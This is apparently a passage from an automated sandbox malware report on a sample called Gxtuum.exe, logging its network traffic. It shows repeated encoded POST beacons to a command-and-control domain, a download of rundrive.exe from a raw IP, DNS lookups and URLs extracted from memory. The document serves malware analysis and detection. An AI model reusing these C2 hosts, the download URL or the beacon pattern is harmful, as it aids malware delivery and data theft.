                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Joe Sandbox ViewIP Address: 107.189.27.66 107.189.27.66
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 45.59.120.8:80
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.59.120.8
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_0008C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep
                          Source: global trafficHTTP traffic detected: GET /files/catlogs/rundrive.exe HTTP/1.1Host: 45.59.120.8
                          Source: global trafficDNS traffic detected: DNS query: cobolrationumelawrtewarms.com
                          Source: global trafficDNS traffic detected: DNS query: towerbingobongoboom.com
                          Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                          Source: unknownHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php:
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpDa
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpPRF
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpPr
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpSOn
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpb
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpjY
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpl
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpwe
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpz
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpzi
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/catlogs/rundrive.exe
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/catlogs/rundrive.exe6
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php&
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php6l
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php7m
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpFm
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpV?
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpY
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpe
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phphl
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpi
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpiYl
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpim
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpir
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpx
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpxm
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                          Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.drString found in binary or memory: https://www.globalsign.com/repository/0
